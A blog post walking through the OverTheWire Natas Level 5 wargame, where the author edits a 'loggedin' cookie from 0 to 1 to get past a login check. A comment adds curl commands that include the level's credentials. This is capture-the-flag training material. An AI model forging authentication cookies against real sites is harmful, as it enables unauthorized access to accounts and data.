Sunday, November 4, 2012

OverTheWire Natas Level 5

Now that we're about 1/3 through to the end of the OverTheWire Natas wargame, I'm hoping that they start to get a little more tricky.  Level 5 unfortunately is still pretty easy.

It starts by simply telling you that you're not logged in.
Logins often hand out cookies, so I viewed my cookies for the site.  I then used the wonderful Chrome extension, Edit This Cookie, to modify the cookie that I saw it assign, from a "0" to a "1", signifying that I was logged on.
After saving the changes to the cookie, I refreshed the page, and it showed me the next level's password.


1 comment:

  1. Without installing any plugins

    1 - Get cookies storing them in a file myCookies
    curl -D myCookies.txt http://natas5.natas.labs.overthewire.org/index.php -u natas5:V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z

    2 - Find what I need
    Set-Cookie: loggedin=0

    3 - Setting the value to 1
    curl http://natas5.natas.labs.overthewire.org/index.php -u natas5:V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z --cookie "loggedin=1"

    ReplyDelete

Popular

Recent

Comments